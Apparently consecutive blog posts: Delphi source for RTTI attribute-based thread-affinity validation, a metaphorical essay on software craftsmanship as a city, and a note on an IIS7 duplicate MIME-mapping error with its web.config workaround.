In order for the program to run without an assertion, you could change the annotation of HardWorkCallback to [NotMainThread]. Making this change serves as an immediate prompt that you should not be accessing VCL properties, because you are no longer running on the main thread. In fact, unless you can prove that the lifetime of the form will exceed that of TSomeThread, you shouldn’t even be referring to the form. The HardWorkCallback function here violates these principles by referring to the Handle property of TForm. However, because we can show that the form is destroyed after the thread exits, it’s safe to make the callback to the TAttrValForm object itself.

You can download the full source for this project from the link at the bottom of this post in order to compile it and run it yourself.

Exercise: How could you restructure this to make HardWorkCallback thread-safe? There’s more than one way to skin this cat.

unit AttrValSample;

interface

uses
  System.Classes,
  System.SyncObjs,
  System.SysUtils,
  System.Variants,
  Vcl.Controls,
  Vcl.Dialogs,
  Vcl.Forms,
  Vcl.Graphics,
  Vcl.StdCtrls,
  Winapi.Messages,
  Winapi.Windows,

  {$I AttributeValidation.inc};

type
  TSomeThread = class;

  TAttrValForm = class(TForm)
    cmdStartThread: TButton;
    cmdDoSomeHardWork: TButton;
    cmdStopThread: TButton;
    procedure cmdStartThreadClick(Sender: TObject);
    procedure FormDestroy(Sender: TObject);
    procedure cmdStopThreadClick(Sender: TObject);
    procedure cmdDoSomeHardWorkClick(Sender: TObject);
  private
    FThread: TSomeThread;
  public
    [MainThread] procedure HardWorkCallback;
  end;

  TSomeThread = class(TThread)
  private
    FOwner: TAttrValForm;
    FEvent: TEvent;
    [NotMainThread] procedure HardWork;
  protected
    [NotMainThread] procedure Execute; override;
  public
    [MainThread] constructor Create(AOwner: TAttrValForm);
    [MainThread] destructor Destroy; override;
    [MainThread] procedure DoSomeHardWork;
  end;

var
  AttrValForm: TAttrValForm;

implementation

{$R *.dfm}

procedure TAttrValForm.cmdStartThreadClick(Sender: TObject);
begin
  FThread := TSomeThread.Create(Self);

  cmdDoSomeHardWork.Enabled := True;
  cmdStopThread.Enabled := True;
  cmdStartThread.Enabled := False;
end;

procedure TAttrValForm.cmdDoSomeHardWorkClick(Sender: TObject);
begin
  FThread.DoSomeHardWork;
end;

procedure TAttrValForm.cmdStopThreadClick(Sender: TObject);
begin
  FreeAndNil(FThread);
  cmdDoSomeHardWork.Enabled := False;
  cmdStopThread.Enabled := False;
  cmdStartThread.Enabled := True;
end;

procedure TAttrValForm.FormDestroy(Sender: TObject);
begin
  FreeAndNil(FThread);
end;

procedure TAttrValForm.HardWorkCallback;
begin
  ValidateAttributes;
  SetWindowText(Handle, 'Hard work done');
end;

{ TSomeThread }

constructor TSomeThread.Create(AOwner: TAttrValForm);
begin
  ValidateAttributes;
  FEvent := TEvent.Create(nil, False, False, '');
  FOwner := AOwner;
  inherited Create(False);
end;

destructor TSomeThread.Destroy;
begin
  ValidateAttributes;
  if not Terminated then
  begin
    Terminate;
    FEvent.SetEvent;
    WaitFor;
  end;
  FreeAndNil(FEvent);
  inherited Destroy;
end;

procedure TSomeThread.DoSomeHardWork;
begin
  ValidateAttributes;
  FEvent.SetEvent;
end;

procedure TSomeThread.Execute;
begin
  ValidateAttributes;
  while not Terminated do
  begin
    if FEvent.WaitFor = wrSignaled then
      if not Terminated then
        HardWork;
  end;
end;

procedure TSomeThread.HardWork;
begin
  ValidateAttributes;
  FOwner.HardWorkCallback;
end;

end.

The AttributeValidation.inc file referenced in the uses clause above controls RTTI and debug settings, in one line. This pattern makes it easy to use the unit without forgetting to set the appropriate RTTI flags in one unit.

// Disable the following $DEFINE to remove all validation from the project
// You may want to do this with {$IFDEF DEBUG} ... {$ENDIF}
{$DEFINE ATTRIBUTE_DEBUG}

// Shouldn't need to touch anything below here
{$IFDEF ATTRIBUTE_DEBUG}
{$RTTI EXPLICIT METHODS([vcPrivate,vcProtected,vcPublic,vcPublished])}
{$ENDIF}

// This .inc file is also included from AttributeValidation.pas, so
// don't use it again in that context.
{$IFNDEF ATTRIBUTE_DEBUG_UNIT}
AttributeValidation
{$ENDIF}

Finally, the AttributeValidation.pas file itself contains the assembly stub to capture the return address for the caller, and the search through the RTTI for the appropriate method to test in each case. This will have a performance cost so should really only be present in Debug builds.

unit AttributeValidation;

interface

{$DEFINE ATTRIBUTE_DEBUG_UNIT}
{$I AttributeValidation.inc}

uses
  System.Rtti;

type
  // Base class for all validation attributes
  ValidationAttribute = class(TCustomAttribute)
    function Execute(Method: TRTTIMethod): Boolean; virtual;
  end;

  // Will log to the debug console whenever a deprecated
  // function is called
  DeprecatedAttribute = class(ValidationAttribute)
    function Execute(Method: TRTTIMethod): Boolean; override;
  end;

  // Base class for all thread-related attributes
  ThreadAttribute = class(ValidationAttribute);

  // This indicates that the procedure can be called from
  // any thread.  No test to pass, just a bare attribute
  ThreadSafeAttribute = class(ThreadAttribute);

  // This indicates that the procedure must only be called
  // in the context of the main thread
  MainThreadAttribute = class(ThreadAttribute)
    function Execute(Method: TRTTIMethod): Boolean; override;
  end;

  // This indicates that the procedure must only be called
  // in another thread context.
  NotMainThreadAttribute = class(ThreadAttribute)
    function Execute(Method: TRTTIMethod): Boolean; override;
  end;

  TAttributeValidation = class helper for TObject
{$IFDEF ATTRIBUTE_DEBUG}
  private
    procedure IntValidateAttributes(FReturnAddress: UIntPtr);
{$ENDIF}
  protected
    procedure ValidateAttributes;
  end;

implementation

uses
  Winapi.Windows,

  System.Classes;

{ TAttributeValidation }

{
 Function:    TAttributeValidation.ValidateAttributes

 Description: Save the return address to an accessible variable
              on the stack.  We could do this with pure Delphi and
              some pointer jiggery-pokery, but this is cleaner.
}
{$IFNDEF ATTRIBUTE_DEBUG}
procedure TAttributeValidation.ValidateAttributes;
begin
end;
{$ELSE}
{$IFDEF CPUX64}
procedure TAttributeValidation.ValidateAttributes;
asm
  push rbp
  sub  rsp, $20
  mov  rbp, rsp
                          // rcx = param 1; will already be pointing to Self.
  mov  rdx, [rbp+$28]     // rdx = param 2; rbp+$28 is return address on stack
  call TAttributeValidation.IntValidateAttributes;

  lea  rsp, [rbp+$20]
  pop  rbp
end;
{$ELSE}
procedure TAttributeValidation.ValidateAttributes;
asm
                            // eax = Self
  mov edx, dword ptr [esp]  // edx = parameter 1
  call TAttributeValidation.IntValidateAttributes
end;
{$ENDIF}

{
 Function:    TAttributeValidation.IntValidateAttributes

 Description: Find the closest function to the return address,
              and test the attributes in that function.  Assumes
              that the closest function is the correct one, so
              if RTTI is missing then you'll be in a spot of
              bother.
}
procedure TAttributeValidation.IntValidateAttributes(FReturnAddress: UIntPtr);
var
  FRttiType: TRttiType;
  FClosestRttiMethod, FRttiMethod: TRTTIMethod;
  FAttribute: TCustomAttribute;
begin
  with TRttiContext.Create do
  try
    FRttiType := GetType(ClassType);
    if not Assigned(FRttiType) then Exit;

    FClosestRttiMethod := nil;

    // Find nearest function for the return address
    for FRttiMethod in FRttiType.GetMethods do
    begin
      if (UIntPtr(FRttiMethod.CodeAddress) <= FReturnAddress) then
      begin
        if not Assigned(FClosestRttiMethod) or
            (UIntPtr(FRttiMethod.CodeAddress) > UIntPtr(FClosestRttiMethod.CodeAddress)) then
          FClosestRttiMethod := FRttiMethod;
      end;
    end;

    // Check attributes for the function
    if Assigned(FClosestRttiMethod) then
    begin
      for FAttribute in FClosestRttiMethod.GetAttributes do
      begin
        if FAttribute is ValidationAttribute then
        begin
          if not (FAttribute as ValidationAttribute).Execute(FClosestRttiMethod) then
          begin
            Assert(False, 'Attribute '+FAttribute.ClassName+' did not validate on '+FClosestRttiMethod.Name);
          end;
        end;
      end;
    end;
  finally
    Free;
  end;
end;
{$ENDIF}

{ ValidationAttribute }

function ValidationAttribute.Execute(Method: TRTTIMethod): Boolean;
begin
  Result := True;
end;

{ MainThreadAttribute }

function MainThreadAttribute.Execute(Method: TRTTIMethod): Boolean;
begin
  Result := GetCurrentThreadID = MainThreadID;
end;

{ NotMainThreadAttribute }

function NotMainThreadAttribute.Execute(Method: TRTTIMethod): Boolean;
begin
  Result := GetCurrentThreadID <> MainThreadID;
end;

{ DeprecatedAttribute }

function DeprecatedAttribute.Execute(Method: TRTTIMethod): Boolean;
begin
  OutputDebugString(PChar(Method.Name + ' was called.'#13#10));
  Result := True;
end;

end.

There you have it — a “real” use case for attributes in Delphi. The key advantages I see to this approach, as opposed to, say, function-level assertions, are that a birds-eye view of your class will help you to understand the preconditions for each member function, and that these preconditions can be consistently and simply tested.

Using a class helper makes it easy to inject the additional functionality into every class that is touched by attribute validation, without polluting the class hierarchy. This means that attribute tests can be seamlessly added to existing infrastructure and Delphi child classes such as TForm.

Full source: AttrVal.zip. License: MPL 2.0. YMMV and use at your own risk.

The Beautiful City of Software

A new frenzy grips the architects, the builders, the carpenters, the painters. The buildings must be changed, must grow, now, now, today. And so they scurry, nailing on curlicues and raising floors, tearing down this staircase, putting up this ladder, and at the end of the day they step back, look up, shake hands and agree to do it again tomorrow, now, now!

In the midst of the twisted roadways runs the river, and across its waters lies a bridge. Call it London Bridge. Not designed. Just happened. And always growing, this way and that way, a feature here, don’t like that one there any more, should bring this railing up to spec, cries the engineer, whilst beside him the others hammer together the new houses that crowd the bridge’s fragile shoulders, and yet again it crumbles, down into the rushing waters, patched even as it falls, and saved at the last moment by the railing that the engineer brought up to spec. But touch not the railing now, lest the whole bridge collapse. Heedlessly, the crowds continue to cross the bridge.

Nestled amongst the towers of this city is a little house. Built by yours truly, it has gables and stands proudly on its own foundations. No one knows how I mixed the concrete, how I discovered for myself the secret formulas of the masons. For now it stands, mirroring the towering edifices surrounding it, calling for its own moment in the light. Crudely, yet lovingly, its facets are shaped, aping the towers’ gleaming edges.

For none can see the bones of those towers now, save in the dreams, nay horrors, of the men who built them. Carefully, the gleaming panels were draped over, and hid the gross deformities beneath a respectable skin. The towers reach skyward, bastions of the city, and all seek to build their own towers in homage to them.

None can see the bones? I speak falsely. There are those who live beneath the surface of the living, creaking city. They crawl inside the hidden and forgotten ways, and learn its secrets, for good, for evil and for love of learning secrets. Some, graspers, take their knowledge, and shake the towers with it, as the owners rush to protect and rebuild, patching the bones with sticking plasters and casts painted in cheerful colours.

No one notices the bones of my little house. Bones no better than those of the towers, if a little smaller.

In the University, I discover how to build a crystal palace, beautiful, fragile and empty, devoid of purpose. Perfect in every way except one. For it has no doors and doors cannot be added. I cannot take the bones from the palace and put them into my house. The crystal bones resile from my rough-hewn timber trusses. They shatter.

I hear the men building in a frenzy and the monster grips me too. I rush from room to room of my house, desperate for change and fame and wealth, shifting this, nailing that, never noticing the damage I wreak until out of breath I stop and look back, just in time, recoiling as I realise how close I came to losing my soul. I run from my house, shaking off the claws of the monster as it howls impotently at me, you’ll get left behind!

Down in the market, I wander from stall to stall. Buy this paint! Use these magic bones: make your house into a tower! Be noticed! My house must be festooned with gargoyles to protect those who enter from the crawlers beneath the city’s skin! The noise is unsettling, the message now bland and tasteless. The graspers watch me walking through, asking themselves if I have anything of worth.

Beyond the market lies the city hall, where the men of import gather. I spin a tale of the beauty of my house, desperate to be noticed, and how strong its bones, how elegant its gables. One man turns and sees me, offers wealth beyond my dreams. But inside my heart I now know he offers only the chance to take my house, my pride, for himself, and tear it apart and spread the best of its blocks amongst his towers. And so I reject him, and again I flee.

But then I find the man in the corner of the market. He has no charms to sell me. Instead he tells me of those who still secretly live in the city, building houses with pride, each more robust and trustworthy than the last, and though sometimes they look toward the gleaming edifices wistfully, yet they themselves were once crawlers beneath the surface, for the love of learning secrets. These men and women are gathering, slowly, he tells me, into a guild. A guild that will protect and honour and create buildings that last, unlike those on the bridge, crumbling and tumbling even now, unlike the towers, gleaming and perfect and rotten to the core.

This time of growth and pain and foolishness must be endured, but it shall pass. The wise men of the University shall join us, he proclaims, and together we shall build with beauty and strength. Gradually the towers shall each fail and fall and be replaced by virtuous buildings of grace, beauty and strength, built with love and care for those who live inside them.

I ask if I may join their guild, and ungrudgingly he bids me welcome, and willingly I set myself to learn.

Making global MIME Type mapping changes in IIS7 can break sites with custom MIME Type mappings

One of the most irritating server configuration issues I’ve run across recently emerged when adding global MIME type mappings to Microsoft Internet Information Services 7 — part of Windows Server 2008 R2.

Basically, if you have a MIME type mapping in a domain or path, and later add a mapping for the same file extension at a higher level in the configuration hierarchy, any subsequent requests to that domain or path will start returning HTTP 500 server errors.

You will not see any indication of conflicts when you change the higher level MIME type mappings, and you typically only discover the error when a user complains that a specific page or site is down.

When you check your logs, you’ll see an error similar to the following:

\\?\C:\Websites\xxx\www\web.config ( 58) :Cannot add duplicate collection 
    entry of type 'mimeMap' with unique key attribute 
    'fileExtension' set to '.woff'

Furthermore, if you try and view the MIME types in the path or domain that is faulting within IIS Manager, you will receive the same error and will not be able to either view or address the problem (e.g. by removing the MIME type at that level, which would be the logical way to address the problem).  The only way to address the problem in the UI view is to remove the global MIME mapping that is conflicting — or manually edit the web.config file at the lower level.
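
Where you do control the lower-level web.config, the usual workaround is to remove the inherited mapping before re-adding it locally. A minimal sketch, using the .woff extension from the error above (application/font-woff was the MIME type commonly used for web fonts at the time):

    <system.webServer>
      <staticContent>
        <!-- Remove the mapping inherited from a higher level first,
             so the local mimeMap does not create a duplicate key -->
        <remove fileExtension=".woff" />
        <mimeMap fileExtension=".woff" mimeType="application/font-woff" />
      </staticContent>
    </system.webServer>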

Not very nice — especially on shared hosts where you may not control the global settings!

See also http://stackoverflow.com/questions/13677458/asp-net-mvc-iis-7-5-500-internal-server-error-for-static-content-only